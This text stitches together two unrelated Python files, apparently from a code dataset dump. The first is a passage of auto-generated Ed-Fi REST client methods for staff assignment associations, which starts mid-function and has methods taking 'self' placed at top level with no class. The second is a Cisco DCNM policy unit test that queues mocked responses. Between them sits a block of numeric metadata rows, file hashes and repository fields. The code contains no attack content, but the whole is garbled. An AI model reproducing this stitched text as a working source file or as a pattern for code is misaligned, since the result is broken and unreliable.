        query_params.append(('stateOfIssueStateAbbreviationDescriptor', params['state_of_issue_state_abbreviation_descriptor']))  # noqa: E501
    if 'employment_education_organization_id' in params:
        query_params.append(('employmentEducationOrganizationId', params['employment_education_organization_id']))  # noqa: E501
    if 'employment_status_descriptor' in params:
        query_params.append(('employmentStatusDescriptor', params['employment_status_descriptor']))  # noqa: E501
    if 'employment_hire_date' in params:
        query_params.append(('employmentHireDate', params['employment_hire_date']))  # noqa: E501
    if 'end_date' in params:
        query_params.append(('endDate', params['end_date']))  # noqa: E501
    if 'full_time_equivalency' in params:
        query_params.append(('fullTimeEquivalency', params['full_time_equivalency']))  # noqa: E501
    if 'id' in params:
        query_params.append(('id', params['id']))  # noqa: E501
    if 'order_of_assignment' in params:
        query_params.append(('orderOfAssignment', params['order_of_assignment']))  # noqa: E501
    if 'position_title' in params:
        query_params.append(('positionTitle', params['position_title']))  # noqa: E501

    header_params = {}
    if 'snapshot_identifier' in params:
        header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[EdFiStaffEducationOrganizationAssignmentAssociation]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_staff_education_organization_assignment_associations_by_id(self, id, **kwargs):  # noqa: E501
    """Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern).  # noqa: E501

    This GET operation retrieves a resource by the specified resource identifier.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_staff_education_organization_assignment_associations_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: EdFiStaffEducationOrganizationAssignmentAssociation
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant yields, so one call covers both cases.
    return self.get_staff_education_organization_assignment_associations_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_staff_education_organization_assignment_associations_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501

    This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_staff_education_organization_assignment_associations_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: EdFiStaffEducationOrganizationAssignmentAssociation
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if the required ``id`` parameter is missing.
    """
    # Full set of keyword names this endpoint accepts; anything else is a
    # caller error and is rejected below.
    all_params = ['id', 'if_none_match', 'snapshot_identifier']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots self/id/kwargs into one dict; the kwargs are
    # then flattened into it so every parameter is looked up uniformly.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_staff_education_organization_assignment_associations_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `get_staff_education_organization_assignment_associations_by_id`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} placeholder of the URL template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optional caching / snapshot behavior is driven purely by headers.
    header_params = {}
    if 'if_none_match' in params:
        header_params['If-None-Match'] = params['if_none_match']  # noqa: E501
    if 'snapshot_identifier' in params:
        header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EdFiStaffEducationOrganizationAssignmentAssociation',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def post_staff_education_organization_assignment_association(self, staff_education_organization_assignment_association, **kwargs):  # noqa: E501
    """Create or update a staffEducationOrganizationAssignmentAssociation.

    The POST operation performs an \"upsert\": the server matches on the
    natural key values in the payload and creates or updates accordingly.
    Clients should NOT include the resource \"id\" in the JSON body. By
    default the HTTP request is made synchronously; pass ``async_req=True``
    to receive the request thread instead (call ``.get()`` for the result).

    :param async_req bool
    :param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper always want just the body, never the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    delegate = self.post_staff_education_organization_assignment_association_with_http_info
    # Sync calls yield the (None) body; async_req=True makes the delegate
    # return the request thread. Either way, its return value is exactly
    # what this wrapper should hand back.
    return delegate(staff_education_organization_assignment_association, **kwargs)  # noqa: E501
def post_staff_education_organization_assignment_association_with_http_info(self, staff_education_organization_assignment_association, **kwargs):  # noqa: E501
    """Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501

    The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.post_staff_education_organization_assignment_association_with_http_info(staff_education_organization_assignment_association, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if the required body parameter is missing.
    """
    # Full set of keyword names this endpoint accepts; anything else is a
    # caller error and is rejected below.
    all_params = ['staff_education_organization_assignment_association']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots the positional args and kwargs into one
    # dict; the kwargs are then flattened into it for uniform lookup.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_staff_education_organization_assignment_association" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'staff_education_organization_assignment_association' is set
    if self.api_client.client_side_validation and ('staff_education_organization_assignment_association' not in params or
                                                   params['staff_education_organization_assignment_association'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `staff_education_organization_assignment_association` when calling `post_staff_education_organization_assignment_association`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The resource representation itself is the POST body.
    body_params = None
    if 'staff_education_organization_assignment_association' in params:
        body_params = params['staff_education_organization_assignment_association']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def put_staff_education_organization_assignment_association(self, id, staff_education_organization_assignment_association, **kwargs):  # noqa: E501
    """Update a staffEducationOrganizationAssignmentAssociation by identifier.

    The PUT operation updates a resource by identifier. A resource \"id\"
    provided in the JSON body is ignored, and natural key values cannot be
    changed through this endpoint. By default the HTTP request is made
    synchronously; pass ``async_req=True`` to receive the request thread
    instead (call ``.get()`` for the result).

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
    :param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper always want just the body, never the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    delegate = self.put_staff_education_organization_assignment_association_with_http_info
    # Sync calls yield the (None) body; async_req=True makes the delegate
    # return the request thread. Either way, its return value is exactly
    # what this wrapper should hand back.
    return delegate(id, staff_education_organization_assignment_association, **kwargs)  # noqa: E501
def put_staff_education_organization_assignment_association_with_http_info(self, id, staff_education_organization_assignment_association, **kwargs):  # noqa: E501
    """Updates a resource based on the resource identifier. # noqa: E501

    The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.put_staff_education_organization_assignment_association_with_http_info(id, staff_education_organization_assignment_association, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
    :param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if ``id`` or the body parameter is missing.
    """
    # Full set of keyword names this endpoint accepts; anything else is a
    # caller error and is rejected below.
    all_params = ['id', 'staff_education_organization_assignment_association', 'if_match']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots the positional args and kwargs into one
    # dict; the kwargs are then flattened into it for uniform lookup.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_staff_education_organization_assignment_association" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `put_staff_education_organization_assignment_association`")  # noqa: E501
    # verify the required parameter 'staff_education_organization_assignment_association' is set
    if self.api_client.client_side_validation and ('staff_education_organization_assignment_association' not in params or
                                                   params['staff_education_organization_assignment_association'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `staff_education_organization_assignment_association` when calling `put_staff_education_organization_assignment_association`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} placeholder of the URL template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    # Optimistic concurrency control is driven by the If-Match header.
    header_params = {}
    if 'if_match' in params:
        header_params['If-Match'] = params['if_match']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The resource representation itself is the PUT body.
    body_params = None
    if 'staff_education_organization_assignment_association' in params:
        body_params = params['staff_education_organization_assignment_association']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 61.975098
| 578
| 0.691649
| 5,617
| 47,287
| 5.586434
| 0.073171
| 0.035948
| 0.072086
| 0.099812
| 0.935211
| 0.925045
| 0.90465
| 0.893177
| 0.878422
| 0.870487
| 0
| 0.013414
| 0.236936
| 47,287
| 762
| 579
| 62.05643
| 0.85622
| 0.425783
| 0
| 0.713592
| 0
| 0.024272
| 0.303967
| 0.159516
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031553
| false
| 0
| 0.009709
| 0
| 0.087379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54a21e5df38604892c8b4a86723e5748f670e300
| 57,486
|
py
|
Python
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 28
|
2020-07-19T02:56:38.000Z
|
2022-03-03T01:28:10.000Z
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 67
|
2020-07-17T21:49:00.000Z
|
2022-03-20T14:59:23.000Z
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 18
|
2020-07-07T14:42:22.000Z
|
2022-03-09T12:31:13.000Z
|
#!/usr/bin/python
#
# Copyright (c) 2020 Cisco and/or its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.ansible.netcommon.tests.unit.compat.mock import patch
from ansible_collections.cisco.dcnm.plugins.modules import dcnm_policy
from .dcnm_module import TestDcnmModule, set_module_args, loadPlaybookData
import json, copy
class TestDcnmPolicyModule(TestDcnmModule):
module = dcnm_policy
fd = None
def init_data(self):
    # Hook for per-test data initialisation; this module does all of its
    # fixture loading in load_policy_fixtures(), so nothing is needed here.
    pass
def log_msg(self, msg):
    """Append *msg* to the unit-test log file, opening the file lazily.

    The file handle is cached on the instance (``self.fd``) so repeated
    calls append to the same ``policy-ut.log``; each write is flushed
    immediately so output survives a crashed test run.

    :param msg: text to write to the log file.
    """
    # Bug fix: the original read and assigned a bare local ``fd`` (which
    # raises at runtime) while writing through ``self.fd``; the handle
    # must be read and stored on the instance consistently.
    if self.fd is None:
        self.fd = open("policy-ut.log", "w+")

    self.fd.write(msg)
    self.fd.flush()
def setUp(self):
    """Patch the dcnm_policy module's external calls before each test.

    Three module-level functions are replaced with mocks whose side
    effects are queued later by load_fixtures()/load_policy_fixtures():
    fabric inventory lookup, ip/serial-number mapping, and the DCNM
    REST transport itself.
    """
    super(TestDcnmPolicyModule, self).setUp()

    # get_fabric_inventory_details -> self.run_dcnm_fabric_details
    self.mock_dcnm_fabric_details = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.get_fabric_inventory_details')
    self.run_dcnm_fabric_details = self.mock_dcnm_fabric_details.start()

    # get_ip_sn_dict -> self.run_dcnm_ip_sn
    self.mock_dcnm_ip_sn = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.get_ip_sn_dict')
    self.run_dcnm_ip_sn = self.mock_dcnm_ip_sn.start()

    # dcnm_send -> self.run_dcnm_send (all REST traffic is canned)
    self.mock_dcnm_send = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.dcnm_send')
    self.run_dcnm_send = self.mock_dcnm_send.start()
def tearDown(self):
    """Undo setUp: deactivate every patcher that setUp started.

    The original implementation stopped only the ``dcnm_send`` patcher,
    leaking the fabric-details and ip_sn patches (started in setUp) into
    every subsequently collected test case.
    """
    super(TestDcnmPolicyModule, self).tearDown()
    self.mock_dcnm_send.stop()
    # Bug fix: these two patchers were started in setUp but never stopped.
    self.mock_dcnm_fabric_details.stop()
    self.mock_dcnm_ip_sn.stop()
#################################### FIXTURES ############################
def load_policy_fixtures (self):
    """Queue canned dcnm_send responses for the currently running test.

    Each branch matches one test method by name (``self._testMethodName``)
    and assigns that test's expected REST responses — in exact call
    order — to ``self.run_dcnm_send.side_effect``. The ordering is
    load-bearing: the mock pops one response per dcnm_send() call, so a
    list entry out of sequence fails the test it belongs to.
    """
    # merged state, none of the policies exist yet: GET(have), 5 creates,
    # then one bulk deploy.
    if ('test_dcnm_policy_merged_new' == self._testMethodName):
        create_succ_resp1 = self.payloads_data.get('success_create_response_101')
        create_succ_resp2 = self.payloads_data.get('success_create_response_102')
        create_succ_resp3 = self.payloads_data.get('success_create_response_103')
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
        have_all_resp = self.payloads_data.get('policy_have_all_resp')

        self.run_dcnm_send.side_effect = [have_all_resp,
                                          create_succ_resp1, create_succ_resp2,
                                          create_succ_resp3, create_succ_resp4,
                                          create_succ_resp5,
                                          deploy_succ_resp]
    # same template used five times: the identical create response is
    # deliberately replayed for each instance.
    if ('test_dcnm_policy_merged_same_template' == self._testMethodName):
        have_101_105_resp = self.payloads_data.get('have_response_101_105')
        create_succ_resp1 = self.payloads_data.get('success_create_response_101')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_101_5')

        self.run_dcnm_send.side_effect = [have_101_105_resp,
                                          create_succ_resp1, create_succ_resp1,
                                          create_succ_resp1, create_succ_resp1,
                                          create_succ_resp1,
                                          deploy_succ_resp]
    # check mode: only the initial GET is issued; nothing is written.
    if ('test_dcnm_policy_merged_new_check_mode' == self._testMethodName):
        have_all_resp = self.payloads_data.get('policy_have_all_resp')

        self.run_dcnm_send.side_effect = [have_all_resp]
    # everything already exists: only GET(have) and the deploy fire
    # (the create responses loaded here go unused).
    if ('test_dcnm_policy_merged_existing' == self._testMethodName):
        create_succ_resp1 = self.payloads_data.get('success_create_response_101')
        create_succ_resp2 = self.payloads_data.get('success_create_response_102')
        create_succ_resp3 = self.payloads_data.get('success_create_response_103')
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
        have_101_105_resp = self.payloads_data.get('have_response_101_105')

        self.run_dcnm_send.side_effect = [have_101_105_resp,
                                          deploy_succ_resp]
    # 101-103 exist, 104-105 do not: only the two missing ones are created.
    if ('test_dcnm_policy_merged_existing_and_non_exist' == self._testMethodName):
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
        have_101_103_resp = self.payloads_data.get('have_response_101_103')

        self.run_dcnm_send.side_effect = [have_101_103_resp,
                                          create_succ_resp4, create_succ_resp5,
                                          deploy_succ_resp]
    # no state given (defaults to merged); empty 'have' response.
    if ('test_dcnm_policy_without_state' == self._testMethodName):
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_105')

        self.run_dcnm_send.side_effect = [[],
                                          create_succ_resp4, create_succ_resp5,
                                          deploy_succ_resp]
    if ('test_dcnm_policy_merge_additional_policies' == self._testMethodName):
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp4_1 = self.payloads_data.get('success_create_response_104_1')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_104_1')

        self.run_dcnm_send.side_effect = [[],
                                          create_succ_resp4, create_succ_resp4_1,
                                          deploy_succ_resp]
    if ('test_dcnm_policy_merge_additional_policies_exist' == self._testMethodName):
        have_resp_104 = self.payloads_data.get('have_response_104')
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp4_1 = self.payloads_data.get('success_create_response_104_1')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_104_1')

        self.run_dcnm_send.side_effect = [have_resp_104,
                                          create_succ_resp4, create_succ_resp4_1,
                                          deploy_succ_resp]
    # multiple switches: per-switch create responses for 101-103, single
    # responses for 104-105, then one multi-switch deploy.
    if ('test_dcnm_policy_merge_multiple_switches' == self._testMethodName):
        create_succ_resp12 = self.payloads_data.get('success_create_response_101_sw2')
        create_succ_resp13 = self.payloads_data.get('success_create_response_101_sw3')
        create_succ_resp22 = self.payloads_data.get('success_create_response_102_sw2')
        create_succ_resp23 = self.payloads_data.get('success_create_response_102_sw3')
        create_succ_resp32 = self.payloads_data.get('success_create_response_103_sw2')
        create_succ_resp33 = self.payloads_data.get('success_create_response_103_sw3')
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp_multi_sw = self.payloads_data.get('success_deploy_response_101_105_multi_switch')

        self.run_dcnm_send.side_effect = [[],
                                          create_succ_resp12, create_succ_resp13,
                                          create_succ_resp22, create_succ_resp23,
                                          create_succ_resp32, create_succ_resp33,
                                          create_succ_resp4, create_succ_resp5,
                                          deploy_succ_resp_multi_sw]
    # deploy=False: create only, no deploy response queued.
    if ('test_dcnm_policy_merge_deploy_false' == self._testMethodName):
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')

        self.run_dcnm_send.side_effect = [[], create_succ_resp4]
    if ('test_dcnm_policy_merge_no_deploy' == self._testMethodName):
        create_succ_resp1 = self.payloads_data.get('success_create_response_101')
        create_succ_resp2 = self.payloads_data.get('success_create_response_102')
        create_succ_resp3 = self.payloads_data.get('success_create_response_103')
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        create_succ_resp5 = self.payloads_data.get('success_create_response_105')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
        have_all_resp = self.payloads_data.get('policy_have_all_resp')

        self.run_dcnm_send.side_effect = [have_all_resp,
                                          create_succ_resp1, create_succ_resp2,
                                          create_succ_resp3, create_succ_resp4,
                                          create_succ_resp5,
                                          deploy_succ_resp]
    if ('test_dcnm_policy_merged_new_with_vars' == self._testMethodName):
        create_succ_resp1 = self.payloads_data.get('success_create_response_125')
        create_succ_resp2 = self.payloads_data.get('success_create_response_126')
        create_succ_resp3 = self.payloads_data.get('success_create_response_127')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_125_127')
        have_all_resp = self.payloads_data.get('policy_have_all_resp')

        self.run_dcnm_send.side_effect = [have_all_resp,
                                          create_succ_resp1, create_succ_resp2,
                                          create_succ_resp3,
                                          deploy_succ_resp]
    if ('test_dcnm_policy_modify_with_template_name' == self._testMethodName):
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_104')
        have_all_resp = self.payloads_data.get('have_response_101_105')
        create_succ_resp1 = self.payloads_data.get('success_create_response_101')

        self.run_dcnm_send.side_effect = [have_all_resp,
                                          create_succ_resp1,
                                          deploy_succ_resp]
    # modify by policy id: an extra leading GET fetches the named policy.
    if ('test_dcnm_policy_modify_with_policy_id' == self._testMethodName):
        create_succ_resp4 = self.payloads_data.get('success_create_response_104')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_104')
        get_response_104 = self.payloads_data.get('get_response_104')
        have_all_resp = self.payloads_data.get('have_response_101_105')

        self.run_dcnm_send.side_effect = [get_response_104, have_all_resp,
                                          create_succ_resp4,
                                          deploy_succ_resp]
    if ('test_dcnm_policy_modify_policy_with_vars' == self._testMethodName):
        create_succ_resp1 = self.payloads_data.get('success_create_response_125')
        deploy_succ_resp = self.payloads_data.get('success_deploy_response_125')
        have_all_resp = self.payloads_data.get('have_response_125')
        get_response_125 = self.payloads_data.get('get_response_125')

        self.run_dcnm_send.side_effect = [get_response_125, have_all_resp,
                                          create_succ_resp1,
                                          deploy_succ_resp]
    # delete flow: GET(have), per-policy mark-delete, config-deploy, then
    # trailing empty GETs confirming the policies are gone.
    if ('test_dcnm_policy_delete_with_template_name' == self._testMethodName):
        have_resp_101_105 = self.payloads_data.get('have_response_101_105')
        mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
        mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
        mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
        mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
        mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
        delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')

        self.run_dcnm_send.side_effect = [have_resp_101_105,
                                          mark_delete_resp_101, mark_delete_resp_102,
                                          mark_delete_resp_103, mark_delete_resp_104,
                                          mark_delete_resp_105, delete_config_save_resp,
                                          [], [], [], [], [],
                                          ]
    if ('test_dcnm_policy_delete_with_policy_id' == self._testMethodName):
        get_response_101 = self.payloads_data.get('get_response_101')
        get_response_102 = self.payloads_data.get('get_response_102')
        get_response_103 = self.payloads_data.get('get_response_103')
        get_response_104 = self.payloads_data.get('get_response_104')
        get_response_105 = self.payloads_data.get('get_response_105')
        have_resp_101_105 = self.payloads_data.get('have_response_101_105')
        mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
        mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
        mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
        mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
        mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
        delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')

        self.run_dcnm_send.side_effect = [
                                          get_response_101, get_response_102,
                                          get_response_103, get_response_104,
                                          get_response_105, have_resp_101_105,
                                          mark_delete_resp_101, mark_delete_resp_102,
                                          mark_delete_resp_103, mark_delete_resp_104,
                                          mark_delete_resp_105, delete_config_save_resp,
                                          [], [], [], [], [],
                                          ]
    if ('test_dcnm_policy_delete_multiple_policies_with_template_name' == self._testMethodName):
        have_resp_101_105_multi = self.payloads_data.get('have_response_101_105_multi')
        mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
        mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
        mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
        mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
        mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
        delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')

        self.run_dcnm_send.side_effect = [have_resp_101_105_multi,
                                          mark_delete_resp_101, mark_delete_resp_101,
                                          mark_delete_resp_101, mark_delete_resp_102,
                                          mark_delete_resp_102, mark_delete_resp_103,
                                          mark_delete_resp_104, mark_delete_resp_105,
                                          delete_config_save_resp,
                                          [], [], [], [], [], [], [], [],
                                          ]
